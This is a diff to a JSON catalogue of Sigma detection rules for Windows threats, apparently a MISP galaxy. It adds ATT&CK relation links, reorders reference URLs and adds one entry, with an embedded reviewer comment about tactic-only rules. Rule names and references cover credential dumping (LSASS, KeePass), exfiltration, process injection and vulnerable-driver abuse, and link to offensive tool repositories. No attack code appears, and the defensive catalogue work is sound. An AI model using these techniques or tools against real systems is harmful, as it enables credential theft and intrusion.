 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml"
 ],
@@ -21969,6 +27616,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0",
 "value": "Malicious Nishang PowerShell Commandlets"
 },
@@ -21994,6 +27650,15 @@
 "attack.t1546.015"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437",
 "value": "Suspicious GetTypeFromCLSID ShellExecute"
 },
@@ -22019,6 +27684,22 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7",
 "value": "WMImplant Hack Tool"
 },
@@ -22043,6 +27724,15 @@
 "attack.t1574.012"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "23590215-4702-4a70-8805-8dc9e58314a2",
 "value": "Registry-Free Process Scope COR_PROFILER"
 },
@@ -22068,6 +27758,15 @@
 "attack.t1048"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355",
 "value": "Powershell DNSExfiltration"
 },
@@ -22094,9 +27793,43 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759",
 "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell"
 },
+ {
+ "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2023/01/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_susp_ace_tampering.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.defense_evasion",
+ "attack.privilege_escalation"
+ ]
+ },
+ "uuid": "2f77047c-e6e9-4c11-b088-a3de399524cd",
+ "value": "Potential Persistence Via Security Descriptors - ScriptBlock"
+ },
 {
 "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.",
 "meta": {
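Review bot: The new Potential Persistence Via Security Descriptors - ScriptBlock entry is the only entry in this hunk without a `related` array, and its `tags` hold tactic names only (`attack.persistence`, `attack.defense_evasion`, `attack.privilege_escalation`) with no `attack.tNNNN` technique. If the `related` links are derived from technique tags, as every other hunk in this patch suggests, the entry will stay unlinked to any ATT&CK object until the upstream rule gains a technique tag, so a consumer pivoting from a technique to the Sigma rules that cover it will never reach this one. It would help to state that limitation in the generator's documentation (tactic-only rules yield no relations) rather than leaving it to be inferred from the output. The remaining fields (filename, level, logsource, refs, uuid) follow the layout of the surrounding entries; the WMI-persistence entry opened at the end of the hunk continues outside it.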
@@ -22110,8 +27843,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md",
+ "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml"
 ],
 "tags": [
@@ -22119,6 +27852,15 @@
 "attack.t1546.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85",
 "value": "Powershell WMI Persistence"
 },
@@ -22145,6 +27887,15 @@
 "attack.t1020"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb",
 "value": "Windows PowerShell Upload Web Request"
 },
@@ -22169,6 +27920,15 @@
 "attack.t1137.006"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad",
 "value": "Code Executed Via Office Add-in XLL File"
 },
@@ -22185,8 +27945,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md",
 "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml"
 ],
 "tags": [
@@ -22218,6 +27978,15 @@
 "attack.t1217"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf",
 "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell"
 },
@@ -22234,8 +28003,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
+ "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml"
 ],
 "tags": [
@@ -22243,6 +28012,15 @@
 "attack.t1490"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42",
 "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script"
 },
@@ -22269,6 +28047,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "73e67340-0d25-11eb-adc1-0242ac120002",
 "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell"
 },
@@ -22293,6 +28080,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb",
 "value": "PowerShell Get-Process LSASS in ScriptBlock"
 },
@@ -22317,6 +28113,15 @@
 "attack.t1070.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb",
 "value": "Suspicious IO.FileStream"
 },
@@ -22343,6 +28148,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7",
 "value": "Invoke-Obfuscation Via Stdin - Powershell"
 },
@@ -22392,6 +28206,15 @@
 "attack.t1216"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6609c444-9670-4eab-9636-fe4755a851ce",
 "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)"
 },
@@ -22416,6 +28239,15 @@
 "attack.t1006"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "0c8ab3eb-df48-4b9c-ace7-beacaac81cc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c",
 "value": "Raw Disk Access Using Illegitimate Tools"
 },
@@ -22432,8 +28264,8 @@
 "logsource.category": "create_remote_thread",
 "logsource.product": "windows",
 "refs": [
- "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
 "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f",
+ "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml"
 ],
 "tags": [
@@ -22441,6 +28273,15 @@
 "attack.t1055.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42",
 "value": "CobaltStrike Process Injection"
 },
@@ -22465,6 +28306,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50",
 "value": "Accessing WinAPI in PowerShell. Code Injection"
 },
@@ -22490,6 +28340,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505",
 "value": "Password Dumper Remote Thread in LSASS"
 },
@@ -22516,6 +28375,22 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda",
 "value": "Bumblebee Remote Thread Creation"
 },
@@ -22540,6 +28415,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f",
 "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread"
 },
@@ -22565,6 +28449,15 @@
 "attack.t1055.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03",
 "value": "Remote Thread Creation in Suspicious Targets"
 },
@@ -22581,9 +28474,9 @@
 "logsource.category": "create_remote_thread",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/denandz/KeeFarce",
 "https://github.com/GhostPack/KeeThief",
 "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a",
+ "https://github.com/denandz/KeeFarce",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml"
 ],
 "tags": [
@@ -22591,6 +28484,15 @@
 "attack.t1555.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "315f51f0-6b03-4c1e-bfb2-84740afb8e21",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a",
 "value": "KeePass Password Dumping"
 },
@@ -22607,8 +28509,8 @@
 "logsource.category": "create_remote_thread",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/mdsecactivebreach/CACTUSTORCH",
 "https://twitter.com/SBousseaden/status/1090588499517079552",
+ "https://github.com/mdsecactivebreach/CACTUSTORCH",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml"
 ],
 "tags": [
@@ -22620,6 +28522,36 @@
 "attack.t1218.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40",
 "value": "CACTUSTORCH Remote Thread Creation"
 },
@@ -22636,8 +28568,8 @@
 "logsource.category": "create_remote_thread",
 "logsource.product": "windows",
 "refs": [
- "Personal research, statistical analysis",
 "https://lolbas-project.github.io",
+ "Personal research, statistical analysis",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml"
 ],
 "tags": [
@@ -22691,6 +28623,15 @@
 "attack.t1127"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16",
 "value": "Remote Thread Creation Ttdinject.exe Proxy"
 },
@@ -22715,6 +28656,15 @@
 "attack.t1055.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee",
 "value": "CreateRemoteThread API and LoadLibrary"
 },
@@ -22741,6 +28691,22 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e",
 "value": "PowerShell Rundll32 Remote Thread Creation"
 },
@@ -22766,6 +28732,22 @@
 "attack.t1068"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6",
 "value": "Usage Of Malicious POORTRY Signed Driver"
 },
@@ -22831,10 +28813,10 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details",
- "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details",
+ "https://github.com/fengjixuchui/gdrv-loader",
 "https://twitter.com/malmoeb/status/1551449425842786306",
 "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
- "https://github.com/fengjixuchui/gdrv-loader",
+ "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml"
 ],
 "tags": [
@@ -22883,18 +28865,18 @@
 "logsource.category": "driver_load",
 "logsource.product": "windows",
 "refs": [
- "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969",
- "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md",
- "https://github.com/Chigusa0w0/AsusDriversPrivEscala",
- "https://github.com/CaledoniaProject/drivers-binaries",
- "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/",
- "https://github.com/namazso/physmem_drivers",
 "https://github.com/jbaines-r7/dellicious",
- "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
+ "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/",
 "https://eclypsium.com/2019/11/12/mother-of-all-drivers/",
- "https://github.com/stong/CVE-2020-15368",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules",
+ "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md",
 "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md",
+ "https://github.com/CaledoniaProject/drivers-binaries",
+ "https://github.com/stong/CVE-2020-15368",
+ "https://github.com/Chigusa0w0/AsusDriversPrivEscala",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules",
+ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969",
+ "https://github.com/namazso/physmem_drivers",
+ "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml"
 ],
 "tags": [
@@ -22903,6 +28885,15 @@
 "attack.t1068"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787",
 "value": "Vulnerable Driver Load By Name"
 },
@@ -22927,6 +28918,15 @@
 "attack.t1569.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073",
 "value": "PowerShell Scripts Run by a Services"
 },
@@ -22979,6 +28979,22 @@
 "attack.t1557.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4ffc1794-ec3b-45be-9e52-42dbcb2af2de",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d",
 "value": "WinDivert Driver Load"
 },
@@ -22995,22 +29011,22 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", - "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/namazso/physmem_drivers", "https://github.com/jbaines-r7/dellicious", - "https://github.com/stong/CVE-2020-15368", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", "https://github.com/tandasat/ExploitCapcom", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + 
"https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/stong/CVE-2020-15368", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://github.com/namazso/physmem_drivers", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ @@ -23019,6 +29035,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "value": "Vulnerable Driver Load" }, @@ -23045,6 +29070,22 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "value": "Vulnerable Dell BIOS Update Driver Load" }, 
@@ -23076,6 +29117,50 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", "value": "Credential Dumping Tools Service Execution" }, @@ -23092,8 +29177,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://processhacker.sourceforge.io/", "https://systeminformer.sourceforge.io/", + "https://processhacker.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml" ], @@ -23103,6 +29188,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", "value": "Process Hacker and System Informer Driver Load" }, 
@@ -23144,8 +29238,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", "https://github.com/alfarom256/CVE-2022-3699/", + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml" ], "tags": [ @@ -23154,6 +29248,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", "value": "Vulnerable Lenovo Driver Load" }, @@ -23179,6 +29282,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", "value": "PowerShell Network Connections" }, @@ -23197,8 +29309,8 @@ "logsource.product": "windows", "refs": [ 